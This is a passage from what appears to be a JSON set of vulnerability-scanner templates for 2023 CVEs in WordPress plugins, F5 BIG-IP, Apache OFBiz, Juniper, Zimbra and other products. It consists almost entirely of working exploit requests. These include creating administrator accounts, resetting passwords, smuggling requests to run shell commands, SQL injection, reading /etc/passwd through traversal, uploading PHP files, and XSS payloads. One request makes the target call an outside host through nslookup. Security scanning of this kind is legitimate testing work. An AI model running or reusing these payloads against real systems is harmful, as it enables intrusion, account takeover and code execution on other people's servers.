HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \"><script>alert(document_domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\"><svg%20onload=alert(document.domain)>"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS","<svg onload=alert(document.domain)>"],"condition":"and"}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file</label>","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<img src=copyparty onerror=alert(document.domain)>\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27641","info":{"name":"L-Soft LISTSERV 16.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wa.exe?REPORT&z=4&\"><script>alert(document.domain)</script>a=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Applications</h2>","Navigation</h2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2009","info":{"name":"Pretty Url <= 1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=((username))&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<img src=x onerror=alert(document.domain)>\")","contains(body_3, \"prettyurls\")"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<itunes:email>\",\"</itunes:email>\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site 